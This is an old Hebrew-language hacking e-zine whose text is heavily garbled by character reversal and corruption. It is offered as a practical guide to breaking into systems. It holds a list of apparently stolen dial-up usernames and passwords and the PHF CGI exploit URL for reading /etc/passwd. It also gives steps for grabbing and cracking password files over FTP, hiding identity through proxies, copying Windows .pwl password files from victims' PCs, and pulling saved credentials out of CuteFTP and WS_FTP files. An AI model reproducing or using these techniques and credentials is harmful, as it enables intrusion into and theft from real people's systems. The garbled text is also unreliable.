$הככ "K היהי כדב הז .רפסמ םתנסחא .תינובשח הלועפ םתעציב .םיכרע רוכזל כדב שמשמ
.הזה רגואב ןסחואמ
BK .עגרכ ןיינעמ אל .םיבושיח עצבל סיסב הזיא יפל רמוא
&K .הזה רגואב ושמתשת !הנומ םיכירצ םתאו פול םכל שי םא .הנומ אוה
$K .םיכרע ןוסחאל םג
,P לש הלחתהה הפיא ןייצל שמשמ אוה .םיכרע וב םיסינכמ אל .בושח דואמ דואמ רגוא הז
.תוארוהה תא עצבל ליחתהל הפיאמ אז !םכלש תינכותה
תנכות תרזעב וארת םירחא הברה הברה דועו הלאה םירגואה לכ תא
debug ל ונפ !הנכותב שמתשהל #יא דומלל ידכ .סוד םע האבש reQerence .הזה טסקטה ףוסב
(0 .ידאלב
ה רגוא והזש דיגנ ואוב "' .יונב אוה #יא ריבסי ינא !ונלש
* + 9 3 : = J N . ; +* ++ +9 +3 +: +=
* + 9 3 : = J N . ; +* ++ +9 +3 +: +=
תא םכל הארמ !הלעמל רתויש רגואה "K לכ תא ללוכ !יעבט בצמב +J רגואה וליאו ולש םיטיבה
קלח לכ !םייתשל קלוחמ הטמל רתויש . .הלעמל יתבתכש ומכ טיב
$םהב שמתשנש םירגואה לכ לש םישרת #ל ןתינ
* + 9 3 : = J N . ; +* ++ +9 +3 +: += "'
* + 9 3 : = J N . ; +* ++ +9 +3 +: += B'
* + 9 3 : = J N . ; +* ++ +9 +3 +: += &'
* + 9 3 : = J N . ; +* ++ +9 +3 +: += $'
שיש יתרמאש בל םתמשש חוטב ינא +J קר בותכו רגוא לכב םיטיב += !המל וניבה אלש הלאל !
תוחפ הרדסה לכ תא םישוע רלבמסאב !הלעמל יתרמאש ומכ + ( * .)ןכ-ומכ שמושמ
.תודוקפל רובעל הצור יתייה וישכעו םיבקוע םתא הפל דעש הווקמ ינא !יקוא
#כ ארקי םייתשל קלוחמש רגוא לכ !והשמ דוע וישכע יקוא
"' ! 2 "7 2 "H
"H רגוא למסמ "Fhigh וליאו "7 רגוא למסמ "Flow .
מ !םהמ דחאו דחא לכ הככ "K ל דע $K .
"K הווש +J וליאו !תויביס "7 הווש . $לוגרת תצק !הז תא רוכזל דואמ בושח !תויביס
.וכותב שי תויביס המכ םימשור םתאו רגואמ קלח וא רגוא םשור ינא
"K . &
B7 . &
9*J
"7 . &
&H . &
$7 . &
!דרוי רדסב תובושת( +J,.,.,.,. )!
הז ןושארה !זמר 0( +J ).
.תודוקפ
.הדוקפה שוריפ המו התוא םיבתוכ #יא !הדוקפ ןתא ינא
.)<( הדוקפה ףוסב קיספ הדוקנ חוכשל אלו רגוא לש םש לכ ירחא קיספ שי !חוכשל אל
איה לדחמה תרירב םלצאש הלאכ שי הנכותו הנכות לכב הנוש איה ריילפמוקה לש לדחמה תרירב
+J סיסבב ותוא בישחת איה סינכתש רפסמ לכ זא ! +J תרירב עגרכש דיגנ ואוב זא !המודכו
איה ונלש לדחמה +* .ינורשע !ילמיצד סיסב !
.םודאב תנמוסמ היהת אמגודה
MoV F #רע לש הקתעה
MoV 6I+, 6I9q ! הרוצ
MoV "', +93q X"'+93Y
"dd F םיכרע ינש ןיב רוביח תלועפ
"dd 6I+, 6I9q ! הרוצ
MoV "', +9q
MoV B', +9q
"dd "', B'q X"'  9:Y
3ub F םיכרע ינש ןיב רוסיח תלועפ
3ub 6I+, 6I9q ! הרוצ
MoV "', +9q
MoV B', +9q
3ub "', B'q X"'  *Y
תא ומשיית !םהילע ודבעת ! םיליגרת המכ םכל ןתא ינא וישכע !םייתניב קיפסמ הזש בשוח ינא
.לארשי לע םולש אובי !זא דע !ילש האבה הבתכב שגפינו םתדמלש המ
רגואה "K #רע טלוק +9 רגואה ! BK #רע טלוק += רגואה ! &K #רע טלוק +. ןובשח םישוע זאו
רגוא !םלוכ ןיב "K הווש היהי := .
$הנוכנה הבושתה תא דומעה ףוסב ףיסומ ינא זא וחילצת אל םא
!םכמצע לע ורמש !האבה םעפל דעו תוארתהל Pirsing
///////////////////
MoV a', +9q
MoV b', +=q
MoV c', +.q
"dd "', B'q
"dd "', &'q
///////////////////
9*N
0( reQerence $
- ה לבא !לבז ןומה םש שי .)ימע דוה תאצוה( ילבמסא תפשל #ירדמה +* םינושארה םיקרפ
.ונל םייטנוולר
.והשמ ילא .םשה תא תרכוז אל ינא ירעצל !ילארשי בתוכ לש אשונב ןייוצמ רפס לע יתעמש 
!ןכ ומכ 9 $קארפ לש םיכירדמ
34ashing the stack Qor Qun and IroQit
8in39 buQQer oVerQlows
תנכות תא םכל גיצי םג ןושארה רפסה debug תואמגודה ומכ תוטושפ תואמגוד תוסנל ולכות #כו
)תיליע תפש אל תאז יכ !רלייפמוק הזל םיארוק אל( רלבמסא תנכות דירוהל #רוצ ןיא .לנה
ומכ תבכרומ M"3M .הזה #רוצל
(0 .ידאלב
+ 6-] +::!+::!+::!+::!+:: [6- ,
By Pirs¡I]ng
9*.
הנוכנ הצירפ
:ךתוא וספתי אלשו ןוכנ דובעל ידכ םהילע רומשל ךירצש םירבד המכ שי
I לא םלועל ..דועו גישהל ךרצת / תגשהש םירבדה לכ תא םושרת הבש (תרבחמב שמתשת .
לע הלאכ םירפ ריאשת
.ךלש חישקה ןנוכה
II .םור ידיסה ךותב קר םהב שמתשתו םתוא בורצ (ךלש רזעה תונכות לכ .
III לכהל תואמסיס םישל רדסב הז .קוחה לע רבוע התא ..רדסב הז !דיאונרפ תויהל דחפת לא .
םירבד ןיפצהל וא
..ךלש בשחמה לע
IV 'ה !בוק תא קוחמת (בשחמל תצרפ םא . LOG 'ה לע עדימה םע HOST ..וכו ךלש
V ..וכו תבותכ ןופל (החפשמ (ירפ םש ריאשת לא םייחב .
VI ךל היהיש דימת . FireWall 'ו Proxy .םידבוע
VII ךרד רבוחמ היהת לא (!רופ התאשכ . UserName .תבנגש שמתשמ םשב שמתשה .ךלש
)המל האר(
VIII וא םיירוביצ םינופל ךרד !ורפ !!תיבהמ !ורפת לא (לודג םוקמל !ורפל דמוע התא םא .
."נרניא הפק"
IX ריאשהל יוצר אל . LOG .ךלש הלחה הז לבא ךלש קינה םע
X .רתוי ןיבתו רתוי דמלת ךכ .ךממ רתוי םיניבמש םישנאמ תולאש לואשל שיבתת לא .
...המיענ הצירפ
..הלחתה םכל היהיש יידכ נרניאל רוביח תואמסיס לש המישר ןאכ םושרל יתלחה
.ןויזיונ לש ליגר רוביח םה תואמסיסה לכ
:השיג ירפסמ
' םיילשורי 6596666 02 ' הפיח ( 8601000 04 ' ביבא לת ( 5113000 03
' תובוחר 9360000 08 ' הילצרה ( 9529999 09 ' ןויצל ןושאר ( 9533333 03
:המסיס :שמתשמ םש
'''''''' '''''''''''
xS_1AsP ohadshap
a48ke71 avx3
Umm65fE sicamtec
dfbF6p1 roniroz
inbaloren tasgiv
6leqTee avniador
Q6h-fZw sgoptics
FZ15426 sk_pr
9*;
תא ליעפהל$ לע וצחלתו (גויחה לש תורדגהל וכל (םכילע דבוע אל תואמסיסה דחא םא
Terminal ($גויחה ירחא
.היעבה המ וקדבתו (תינדי המסיסהו שמתשמה םש תא ושיקת זאו
.נרניאה לע ןמזה ותואב תולעל דחא שמתשממ רתויל השרמ אל )תורבחה לכו( ןויזיונ
ZiroCool
9+*
םעפ לש תוצירפ
.הנשי תוחפ תצק הדגאו (הנשי הדגא םכל רפסל ךלוה ינא
'ה תדגא איה הנשיה הדגאה PHF תארקנ (הנשי תוחפה (התרבחו . FTP Hacking .
.תומייקש תונשי'יכה'עמכה תוישה יתש (יתוברו יתוריבג (ןה ולא
.םויכ תושימש אלו עמכ רבכ (ולא תוישש (רמולו םידקהל שי
PHF .)!!דחא יתאצמ ינאו( )!( תשרה לכב םירתא ינש לע ילוא תלעופ (וז היש :
FTP 'כ לע ילוא תלעופ (הנשי תוחפ תצק היש : 15º .םימייקש םירתאה ללכמ
תודבוע אלש תויש לע ונל רפסל הצור הזה יכיספה המל זא$ :םכמצע תא םילאוש חב םתא
ונחנא ירה (רבכ
ןיב קיפופ םע םיעשת תונב תושישק םע קסעתהל ליבשב אל (םידבועש םירבד דומלל ליבשב הפ
$+++םיידשה
.אלש (והז זא
ארקיש (יוצר #או יאדכ ()הסנמ אל וליפא ינא (הזמ וחכשתו( רקאה ומצעל אורקל רמייתמש ימ
.)ןינעמ אל הזש ודיגת לאו( ותוא ןינעמש רמוחב רושקו אצומ אוהש (ר'ב'ד ל'כ (רבד לכ
אתבס'בס'בס'בס'בס לע הנק הישעמ הפ םכל רפסא תאז לכב ינא (ןכלו PHF אתבסו FTP
Hacking .
:הנושארה הישה PHF
''''''''''''''''''''
ןוכנ רתוי וא PHF .ל$ז
.תשרה לכב םירתא ינש לע )!( ילוא תלעופ איה (יתרמא רבכש ומכ
.הפ התוא ןייצא ינא (הושפ יכה תמאב איהש ללגבו (דרוקרה ליבשב קר (תאז לכב לבא
+תושעל ךירצ המ זא
לש םירמרפה תא תבותכה לש םוקמב בותכלו דעי'רתא רוחבל (ןפדפדה תא חותפל ךירצ
.הישה
:אמגוד ןלהלו
רתאל !ורפל םיצור ונחנאש דיגנ
www.bla.com
בותכנו (ןפדפדל סנכנ זא
http://www.bla.com/cgi-bin/phf?Qalias÷xº0a/bin/catº20/etc/passwd
.םלועב ושפ יכה (והז
+לעופ הז ךיא
.הככ זא
השיג ןתונ היה (תמיוסמ הדוקפ תלבק ידי לעש (פירקס !בוק םייק היה (םעפ לש םיתרשב
תאירקל
.תרשה לע םירומשה םיצבק
.תואמסיסה !בוק תא אורקל השיג םילבקמ םצעב ונחנא תאזה הרוצבו
:תואמסיסה !בוק והמ
ארקנ ללכ ךרדב( תואמסיסה !בוק תא גישנש עגרב passwd וילע !ירהל לכונ ) תמויס אלל
!ורפתש הנכות
.אמסיסה תא
:רתויב ושפ תואמסיס !בוקל אמגוד הנה
root:RqX6dqOZsf4BI:0:1:System PRIVILEGED Account,,,:/:/bin/csh
field:PASSWORD HERE:0:1:Field Service PRIVILEGED
Account:/usr/field:/bin/csh
9++
operator:PASSWORD HERE:0:28:Operator PRIVILEGED
Account:/opr:/opr/opser
ris:Nologin:11:11:Remote Installation Services Account:/usr/adm/ris:/bin/sh
daemon:`:1:1:Mr Background :/:
.ארונ ךכלכ אל הז (ולהבת לא
:לשמל .הרוש לכ לש םינושארה םיקלחה ינש הז )םייתניב( ונתוא ןינעמש המ
root:RqX6dqOZsf4BI
(ןושארה קלחה root .שמתשמה םש אוה (
שמתשמה :הרעה root לכל השיגה תא שי ול .לוכיבכ רתאה לעב (ישארה שמתשמה אוה
.תרשב םיצבקה
.הז שמתשמל אמסיסה תא לבקל #ואשל םיכירצ ונחנא
(ינשה קלחה RqX6dqOZsf4BI .תנפצומה אמסיסה אוה (
תנכות וילע !ירהל אוה תושעל םכילעש לכ (הככ הארנש תואמסיס !בוק גישהל םתחלצהו היהו
הצירפ
.)דציכ ךשמהב רבסוי(
!לבא
:ךכ הארנ אוהש ולגתו (תואמסיסה !בוק לא עיגהל וחילצת (םימעפל
root:`:0:1:Operator :/:
ftp:`:53:53:anonymous ftp:/pub :
t2:`:201:201:Takaoka Tadashi:/pub :
:בל ומיש
+הרק המ
שמתשמה םש אוהש םיעדוי ונחנאש (ןושארה קלחה תא ונל שי (הנושארה הרושב root
!!!!!!תיבכוכ שי (תנפצומה אמסיסה תויהל הרומאש ןכיה (םייתודוקנה ירחאו
.$לצומ$ !בוק (יתוברו יתוריבג (והז
ןיאש (רחא !בוקל התוא וריבעה ושפ .אמסיס לכ לע $לצ$ ושעו (!בוקה לע ורבעש תרמוא תאז
.וילא השיג ונל
.רחא םוקמ תוסנל אלא (הרירב םכל ןיא (הזכ !בוקב םתלקתנו הרקמב
.$לצומ$ !בוק חצפל תורשפא םוש ןיא
'ה תיש ןאכ דע PHF .
:הינשה הישה FTP HACKING
'''''''''''''''''''''''''''
.הנורחאל תוקפס ולוה (התוכיא יבגל םג ךא (הינשה הישה איהוז
תנכותל קקדזנ (תישאר FTP :ןה תוצופנה םייתשה . Ws_ftp ו Cute ftp .
לע םג !ילממ ינא ךא bulletproof Ftp .
.דחוימב ךבוסמ אל הז (קא"צ קי"צ התיא דובעל ודמלת (הנכותה תא םתדרוהש רחאל
.רבחתהל זאו (תבותכה תא סינכהל םוקמ תויהל ךירצ
אוהש חוב עמכ( אמסיסו שמתשמ םש םכממ שקבמ רבחתהל םיסנמ םתא וילא תרשה םא
()שקבי
:וללה םירפב ושמתשה
username: anonymous
password: some¡host.com
9+9
הלימה תא שמתשמ םש רותב םיסינכמ םא anonymous
ןבומכ .ולש ליימ'יאה תבותכ תא קפסי אוהש יאנתב (סנכהל רקבמ לכל םישרמש םיתרש שי
קפסנ אל ונחנאש
בותכנ אלא (תירוקמ תבותכ some¡host.com
.רחא תרש הסנ (תיחדנ השיגה םא
שמתשמה םש םע תרשל החלצהב תסנכנש רחאל anonymous תישארה הירפסל עיגת התא
.)ללכ ךרדב( תרשה לש
תארקנ םישפחמ ונחנא התואש הירפסה etc
(השפחלו תרשב בבותסהל הסנ (תאזכ הירפס האור ךניא םא .הילא סנכ (תאזכ הירפס הנשי םא
.רחא תרש הסנתש וא
תירפסב etc .םיצבק ינש שי ללכ ךרדב
passwd !!!דירוהל םיכירצ ונחנאש !בוקה הז ''''''''''''''' 22
group רתוימ ללכ ךרדב( םישמתשמ תוצובק תומש ליכמש !בוק ''''''''''' 22
.)ונליבשב
!בוקה תא ודירוה passwd תא וב תוארל רשפא ןכאש( $לצומ$ וניא אוהש וקדב (םכלש בשחמל
.)תונפצומה תואמסיסה
תליחתב זא (אל םא ($בו$ !בוק הז המ תעדל םירומא םתא( בו !בוק גישהל םתחלצהו היהו
לע רבסומ רמאמה
.הצירפ תנכות וילע וצירה ()תואמסיס יצבק
$!עגר עגר עגר$
$+++הצירפ תונכותב םישמתשמ ךיא$
יל םיארוק ןידע (ןכ ןכ( !הפ ינא הז ליבשב !+םיצחלנ םתא המ a03l (לק םש אל הזש עדוי ינא (
)!ולגרתת לבא
.תשרב תומייקש (תובר ינימ תחא הנכות םע דובעל דציכ םכל ריבסהל הסנא ינא
.רתויב הושפה םא יכ (רתויב הבוה הנניא איהש ןייצל שי
:ןה תוצלמומה תונכותה
Cracker 1ack
וא
1ohn The Ripper
תארקנ (התיא דובעל ךיא ריבסא ינאש הנכותה Killer Cracker
ינא (תויש המכ שיש ןבומכ( הצירפ תנכות תדבוע דציכ םכל ריבסהל יל ונת (לכ םדוק ךא
לע קר ריבסא
): ןלצע ינא יכ (תחא
וא יפלא וב םושרש שמתשמ לכ לע הסנמו (תואמסיסה םע !בוקה תא תחקול (הצירפ תנכות
(תואמסיס ינוילימ
( ןולימה !בוקב תונסחואמש dictionary .)
!בוקה ךרד ריבעהל הנכותה הסנמ םתואש (תואמסיס לש םיגוס ינימ לכ םיליכמ ןולימ יצבק
םא תוארלו תואמסיס
.המאתה שי
!בוק !ורפל ךלש יוכיסה לדגי ךכ (רתוי לודג היהי ךלש ןולימ !בוקהש המכש (תרמוא תאז
.תואמסיס
.ומצע תא דבכמש גניקאה רתא לכ עמכמ דירוהל ןתינ ןולימ יצבק
.םימייוסמ םיקוח יפל ןולימ יצבק תונובש תונכות יפלא שי (ןכ ומכ
לש םיירשפאה םיפוריצה לכ תא ליכיש ןולימ !בוק ךל ןיכתש הנכותמ שקבל לוכי התא (לשמל
תויתואה
ABCDEFGHI1KLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
םירפסמהו 1234567890
9+3
ךרעב שיש איה היעבה (!בוקה תא !ורפל חילצתש חוב עמכ הככ
33,000,000,000,000,000,000,000,000,000,000
( 853,058,371,866,181,888 ( ZiroCool 'מ( ...שקעתמ ינא ' 1 דע 10 ))םיוות
.עקתי וליפא ילואו (םלוכ תא !ירהל םייסי אל םייחב בשחמהו (םיירשפא םיפוריצ
.דחא תושעל וא (םירחאמ #וסאל (ןכומ !בוק גישהל !ילממ ינא
ןיב לש לדוגב ךרעב ןולימ !בוק גישהל יוצר 10 ל 15 .הגמ
' ב םישמתשמ ךיא זא (ייקוא Killer Cracker +
ךרד (סודל סנכנ (רקארק רליק םע דחי הירפסה התואב תואמסיס !בוקה תא ונרמשש ירחא
.סודניוו
:בותכנו (רקארקה ןקתוה הב הירפסל ךלנ
kc
ונתיאמ שקבת הנכותה וישכע PWfile .הדיצמ דמחנ
ללכ ךרדב( ונדרוהש תואמסיסה !בוק תא ונרמש וב םשה תא סינכנ passwd .)
0000
!!!הנכותה לש הירפסה התואב רומשל שי תואמסיסה !בוק תא : 1בושח1
''''
שיקנ (ןבומכו Enter .
שקבת הנכותה וישכע Wordfile .
התואב רומשל םיכירצ םתא נרניאהמ בר למעב םתדרוהש ןולימה !בוק תאש ןייצל רתוימ
.הנכותה לש הירפס
:לשמל( ןולימה !בוק לש םשה תא וסינכה dictionary.txt )
שקבת הנכותה זאו Validfile ומכ (שדח סק !בוק לש םש םתס וסינכת ( new.txt ושיקה זאו
Enter .
תא וחתיפ ()הברה וליפאו (ןמז תחקל לולע( תואמסיסה !בוק תא קורסל םייסי רקארקהש רחאל
םתסנכהש !בוקה
ב validfile :)רתוי וא תוחפ( הזל המודש והשמ תוארל םירומא םתא םשו (
root:root:0:1:System PRIVILEGED Account,,,:/:/bin/csh
+ןוכנ (תואמסיסה !בוקל המוד
שמתשמל (לשמל ןאכ .תונפצומ אל תואמסיסה (הפש קר root היהת אמסיסה ( root .
:הפ שי המ וניבת םא הארנ וישכע
Mark:Loadit:0:1:System PRIVILEGED Account,,,:/:/bin/csh
!דואמ ןוכנ
אוה שמתשמה םשש תוארל רשפא ןאכ Mark איה אמסיסהו Loadit .
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
..םויסלו'
ה תיש איה רתויב השימשהו הצופנה רשאכ (!ורפל רתוי תובו תויש תומייק (םויכ
exploits רפנ הילע
.תרחא תונמדזהב
!םתדמלו םתמנפהש הווקמ ינא
.םעפהל ןאכ דע
הכמ #ח אוהש ירחא םוקל עדוי רניווהש אוה (רזולל רניוו ןיב לדבההש ורכזת (האבה םעפל דעו
(הפצרל לפנו
.ומצע לע םחרמו בכשל ראשנ רזולהו
a03l .
Phadiskiastorimansus
9+:
Proxy תיתימאה תוהזה לע הרימש '
'ב םישנא ךיא םיהות םישנא הברה IRC תיתימאה תוהזה תא םיארמ םניא םירחא םירתאב וא
.םהלש
ומכ םירבד םילבקמ (שמתשמה לע עדימה תא קודבל םיסנמשכ וליפא fuck.bill.gates.co.uk .
.ללכב יסקורפ הז המו (יסקורפב םישמתשמ ךיא םכל ריבסא ןכל
( יסקורפ הזמ Proxy +ללכב ותוא ךירצ המלו )
'''''''''''''''''''''''''''''''''''''''''
.נרניאה ןיבל ךניב רשקמ רברסה .ךלש בשחמה לע דבועש רברס םצעב הז יסקורפ
.וכרד םג רבוע לבקמ התאש המ לכו יסקורפה ךרד רבוע נרניאה ךרד ריבעמ התאש המ לכ
תא הריתסמ תאזה הישהו ()קדצב( םידיאונרפ שממ שממ ונחנא ללכ ךרדב' +ךירצ המל
.ונלש תוהזה

1

ךרד רוביח IRC
'''''''''''''''
'ה תנכות לש תורדגהב client ללכ ךרדב( ךלש mIRC רידגהל תורשפא (תויורשפאב הייהי )
וא יסקורפ
FireWall .)רבד ותוא הז ונלש הרקמב(
'ב םישמתשמ ונחנאו דיגנ mIRC :
לע ירפתב םיצחול File--> Options--> Connect --> Firewall .
:םה יסקורפ רוציל יידכ ונל םיצוחנה םירבדה
Hostname יסקורפה תא ךל ןתונש רברסה '
Port 'ה ' port וב שמתשמ יסקורפ ךל ןתונש רברסהש
Use Firewall .הנגהה תא ליעפהל ידכ "+" הז לע םינמסמ '
' אמגודל 8080 : proxy.encomix.es .
'''''''''''''' ''''
.רברסה םש '1 1
'ה '1 port הייהי ללכ ךרדב . 8080
( םירתא ךרד רוביח HTTP )
''''''''''''''''''''''''
.ןפדפדה ךרד ךיילע עדימה תא לבקמ רברסה (רתאל רבחתמ התאשכ
:הז ומכ והשמ הארנ עדימה
( xxx.xxx.xxx.xxx - (compatible; MSIE 5.0; Windows 98
''''''''''''''' '''''''''''''''''''''''''''''
1 1
ךלש יפ ייאה תבותכ '1 1
הלעפהה תכרעמו (שמתשמ התאש ןפדפדה םש '1
9+=
ךלש בשחמה
@cC?Rb _WR_W@B
אל הז זא רתאב תסנכנש תומוקמהו העש (ךיראת אוה לבא ךיילע לבקמ רברסהש עדימ דוע שי
.בושח
:ןפדפדב יסקורפ ןיקתהל שי ךיילע םירפ האריי אל רברסהש ידכ
:לע !וחלל שי ןיקתהל ידכ Tools--> Internet Options
'ל עיגהל Connections--> Settings םש ןמסלו use a proxy server .
'ה לש הרדגה ומכ איה רתאה יסקורפה תרדגה IRC .השק הייהי אל הזש ךכ
( יסקורפ תמישר Proxy םיירשפא )
''''''''''''''''''''''''''''''
cache1.dsldesigns.com:1080
nt.onninen.ee:8080
i.am.the.god.of.ircnet.pl:8080
proxy-wi.dataway.ch:8080
bess3.proxy.lacoe.edu:8080
proxy.iprolink.ch:8080
prox2.mediaserv.net:8080
magica.ntb.no:8080
DSL-2-149.isd.net:1080
.וספתית לאו (םכלש תיתימאה תוהזה לע בו בו ורמשת (..םוכיסל
PsykoTraz ו ZiroCool
9+J
בשחמ ךותב הנוכנ הדובע
+וישכע המ ..תויקית / םיננוכה תא ונלביק ..בשחמה ךותל ונצרפ
.דבוע שמתשמה בשחמ הזיא לע קודבל אוה תושעל םיכירצ ונחנאש ןושארה בלשה
'ב איה וישכע דובעל הבו יכה הישה Dos 'ב אלו ( Windows רתוי הברה אוה סודהש ינפמ
.תיפארג הדובע תביבס לע דבוע אל אוהש ינפמ (םיצבק קיתעהלו תוארהלב ריהמ
.ותוא !ורפלו תואמסיסה !בוק תא דירוהל איה וישכע ונלש הרמה
םישוע dir 'ה תירפס איהמ םיקדובו Windows .
' איה הירפסה ללכ ךרדב Windows, Win, Win98, WinME, Winnt דחא םתאצמ אל םא .
(תוירפסה ןמ
םא הלא (רבד הזכ ןיא( ונאצמ אלש בצמב ..םשב המוד הירפיס וזיא וקדבתו ןוימידה תא וליעפת
3 ןנוכה ךותל סנכ ()..קופד שממ התא Admin תירפס ךותל עיגי רשי אוהו (דחא שיש הווקתב
.הלעפהה תכרעמ
איה םאה הז ונל בושח ןכש המ לבא (הלעפהה תכרעמ תסריג איהמ ונל בושח שממ אל
NT/2000 וא 98/95 / ME .
Windows NT/2000 .!ורפל ךבוסמ רתוי הברה אוהו תואמסיס תרימש לש הנוש הרוצב דבוע
ונל שיש בצמב NT/2000 .
םושרנ (תרחא הסריג ונל שיש "ילמרונ" בצמב .הזה עקה תא תעכ בוזענ dir `.pwl .
'ה !בוק PWL דחא !בוקמ רתוי לבקנש תויהל לוכי .שמתשמה ותוא לש תואמסיסה !בוק אוה
רתוי שיש ללגב הזו
תא !ורפלו תואמסיסה יצבק לכ תא דירוהל עיצמ ינא הזכ בצמב .בשחמה לע דחא שמתשממ
םיצור םתא םא לבא .םלוכ
ךרד וקדבת ()יוצר אל' םעפ דוע( בשחמה לע וישכע דבועש שמתשמה לש קר תואמסיסה תא
nbtstat (ולש םשה המ
+םידירומ ךיא .ולש !בוקה תא קר ודירותו copy `.pwl c:\pass 'ה תא ונשת( c:\pass רבד לכל
.)רחא
'ה יצבק תצירפל תונכות הברה שי ..וישכע PWL הנכותה איה תצלמומ יכה הנכותה . PwlTool .
PwlTool יידי לע ותוא תצרופ איה (החילצמ אל איה םאו (!בוקה ךותבש תואמסיסה תא תקדוב
BruteForce .
.תרבחמב ומשרת ..דואמ בו +)נרניאל רוביח לש ללכ ךרדב( תואמסיס וניליג
'ה תיירפס ךותב רבכ וישכע ונחנאש ללגב Windows ללכ ךרדב( הדובע ןחלוש'ה תירפסל וסנכ (
Desktop .)
'ה יצבק תאו (םש שיש םיצבקה תא וקדבת txt .םהלש
'ה ךןתב לכה / םירפסמ / תואמסיס םימש םישנא ללכ ךרדב desktop הז םא דחוימב (םהלש
!בוק txt .ןק
יצבק .% lnk םא ולהבית לא .)ךרד רוציק( בשחמב רחא םוקמל םתוא םירשקמש םיצבק םה
סודב הז תא םיאור םתא
.הזמ םיניבמ אלו
, ' וישכע ..וננהנ (הדובעה ןחלושב ונרייס cd .הלחתהל הרזחב העיגהל .
םעפ דוע םושרל dir יצבק שפחלו txt ' ל סנכהל ךכ רחא .ןיינעמ והשמ שי ילוא תוארל My
documents
( cd My documetns וא ( cd mydocu~1 .ןיינעמ והשמ שי םש םג ילוא תוארלו )
יבשחמב NT/2000 ' תירפיסב םימקוממ (ילש םיכמסמהו הדובעה ןחלוש ( Documents and
settings\User\Desktop
User ןכל ()סקוניל ומכ עמכ( ולשמ הדובע ןחלושו (ילש םיכמסמ'ה תא שי שמתשמ לכל '
לכ םע םש קחשל יאדכ
.םירזויה
Desktop םג םש שי .הדובע ןחלוש ' My documents וליפאו ( Start Menu .
9+N
ךותל וסנכ ..וישכע Program Files ..
םשב הירפס םש שי םא NetBus / sub7 %.% ומשרתו היילא וסנכ ..וכו del זאו( ( y .)
..םיכישממ +לבז ונקחמ
ותואל םתצרפ ושפ הז ללגבש וא( נרניא רתא ליכמ וילא םתצרפש םדא ןבהש בצמ שי
..)םדאנב
'ה תונכות ךותב שפחל איה הרמה FTP ךלש בשחמה לא התוא קיתעהלו המסיסה תא ולש
)..ךשמהב(
+ונייהש ןמיס ריאשהל ..םדא'ןב ותואל קיפסמ ונצרפ ..ייקוא
..םירתאו תומוקמל תואמסיס (עדימ ןאכמ ול םתבנגש ורכזית .תויוש ושעת לא .!אל' עיצמ ינא
! ורהזית קר ..םכל אבש ךיא ..לבא ..לבח .דחוימ והשמ םש ול וקחמת לא םג
ZiroCool
9+.
לש תואמסיסה !בוקל הצירפ CuteFTP 'ו WS_FTP

"שארב שאר" תכלל םוקמב (המסיסה תא תולגל לק רתוי היהי (רתאל !ורפל ידכש דואמ עודי הז
'ה םע Firewall .
'ה Firewall בצמל עיגהל םמצעל תושרמ אל ותוא תושועש תורבחהש ינבצע דואמ דואמ רבד הז
!ורפי והשמש
תויוע ולגיו הרבחב םהל ודבעיש יידכ רתויב םיבוה םירקאהה תא םינוק םה ןכל (ותוא
םינתונש םיגאבו
( "תירוחא תלד" Backdoor .!ורפל םיצורש הלאל )
היירפסל סנכהל רשפא (הלודג הרבח לש רברסל רבוחמ אלש ליגר שמתשמל ונצרפש עגרב (ןכל
'ה תנכות לש ftp
.ולש תואמסיסה !בוק תא םשמ דירוהלו רתאל עדימה תא הלעמ אוה הנממש (ולש
'ב םיצבק תרבעהל תוירקיעה תונכותה ינש ftp ' ןה CuteFTP 'ו WsFtp
CuteFTP בורל( C:\Program Files\GlobalSCAPE\CuteFTP )
''''''''''''''''''''''''''''''''''''''''''''''''''''''
אוה !בוקה םש SmData.dat וא sm.dat .הנכותה לש תישארה היירפסב אצמנ אוהו
:הככ יונב !בוקה
4+4 DWebsite.ftp.mywebsite.com^Dwebmaster^H©?«^?^?^??? ^B ^? ^U ^B
^?^?^?^?^B ^B ^B ^B ^B ^A 3
' '''''''''''''''''''''''' ''''''''' ''''''''
'ה תבותכ '1 1 1 ftp
שמתשמה םש '1 1
תנפצומ המסיסה '1
WS_Ftp ב אצמנ בורל( C:\Program Files\WS_FTP )
''''''''''''''''''''''''''''''''''''''''''''''
אוה !בוקה םש WS_FTP.ini .הנכותה לש תישארה היירפסב אצמנ אוהו
:הככ יונב !בוקה
5 someserver.net )!בוקב "היקית" רותב( םירבחתמ וילאש רברסה םש ' &
HOST÷someserver.net רבדה ותוא '
UID÷username םדא'ןבה לש שמתשמה םש '
PWD÷V85BBA542C741701BA410C68F1EB2C0B1A76C793867A4 המסיסה '
תנפצומ
DIR÷"/Ipswitch/Product_Downloads 1 ' $
PASVMODE÷1 .ונל םיבושח אל שממש םירבד 1
TIMEOFFSET÷0 1
rdir0÷"/public_html 1 ' $
.תממומ םתסו תכבוסמו (השק איה תחא תורשפא .המסיסה תא תולגל תויורשפא ינש שי
ןוכנ לבא
9+;
זא םהלש תיתימאה הפשה םוקמב תיראניבה הפשב רבדל םיצורש םישנא הרבחב ןאכ ונל שיש
:הישה הנה
' םיותה תא שי המסיסב
ABCDEFGHI1KLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567
890 +.2$:/61)0/.(7"&5,-'89)(%:4;3<=!
.)ןיידע לבא םישמתשמ אל ללכ ךרדב לאמשמש םיוותה(
.הלב רוציל הככו םשור הז םיוות הזיא םעפ לכ קודבלו ךלשמ המסיס תושעל הז םישועש המ
לש תא ךיילא קיתעהלו (ךלש תואמסיסה לש ירוקמה !בוקה תא רומשל :הלקה הישה תא שיו
תדרוהש שמתשמה
.)!!למומ( .םירברסה לש המישרב המסיסה תא רשי לבקתו הנכותה תא ליעפהל זאו (ונממ
ZiroCool
99*
MOTOROLA יאנכ דוק '

ךותב םירבד הברה תונשל רשפאמש יאנכ דוק שי הלורוומ לש םיירלולסה םינופלל
.ןופלה
( $בצמ הקידב$ל סנכהל ךירצ הלחתהב Test Mode .םירחאה םירבדה לכל םיעיגמ םשמו ()
םירותפכה םע הלורוומ לש םינופלב דבוע דוקה FCN, STO לע דבוע אל . GSM .
..אל אל זא ..תולקב ןופלה תא סורהל םילוכי םה המל (הלאה םידוקה םע דואמ רהזהל שי
' שיקהל שי $בצמ תקידב$ל סנכהל יידכ FCN 00``83786633 STO #, 55# .
ךותב דוק דוע שיקהל איה תחא תורשפא .תויורשפא ינש ונל שי דוקה תא ונשקהש ירחא
תורשפאו ($בצמה תקידב$
.איבמ ןופלהש םירפב #דפדלו % שיקהל איה היינש
